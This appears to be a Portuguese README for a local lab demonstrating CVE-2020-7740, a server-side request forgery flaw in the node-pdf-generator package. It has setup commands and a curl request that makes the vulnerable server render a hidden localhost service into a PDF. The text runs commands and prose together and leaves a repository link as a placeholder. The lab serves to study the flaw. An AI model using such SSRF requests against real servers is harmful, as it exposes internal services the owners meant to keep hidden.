
Um exemplo de CVE-2020-7740
Isso afeta todas as versões do pacote node-pdf-generator. Devido à falta de validação e sanitização da entrada do usuário no conteúdo fornecido ao node-pdf-generator, é possível que um atacante crie uma url que será passada para um servidor externo, permitindo um ataque SSRF.
docker run -p 3000:3000 cve-2020-7740localhost:3001 diretamentecurl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf para ver o site localhost que deveria estar oculto.git clone {link a ser inserido}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer o servidor estará executando em localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService o servidor estará executando em 'localhost:3001`curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com no arquivo test.pdf